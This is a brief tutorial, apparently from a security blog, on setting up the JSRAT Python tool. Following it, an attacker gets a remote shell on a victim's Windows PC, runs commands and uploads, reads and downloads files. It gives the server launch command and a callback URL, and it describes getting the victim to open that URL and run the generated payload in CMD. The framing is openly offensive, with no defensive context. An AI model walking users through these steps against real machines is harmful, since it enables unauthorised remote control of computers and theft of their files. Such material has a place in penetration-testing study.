JSRAT is a python Script that can be used to get a remote shell of victim pc.
Installation & Setup :-
- Download the JSRAT tool from github
- Download and give appropriate permission to execute the script.Above figure shows the complete installation
Starting the web server:
- Run and execute the command: python JSRAT.py -i -p 8080
- JSRAT provides the list of URLs.Copy the Client command here it is http://192.168.172.143:8080/wtf
- Open this Client command URL with Victim browser
- To gain the shell payload generated by URL should be opened with CMD.
- Once the command is executed a shell will be obtained.
BACK TO ATTACKERS MACHINE:-
- Here we go !!! We have connected to Victim machine
- Let us try some windows command: Ipconfig
- Above Figure shows executing the command calc opens up the windows calculator. JSRat can also provide upload, Read and Download files.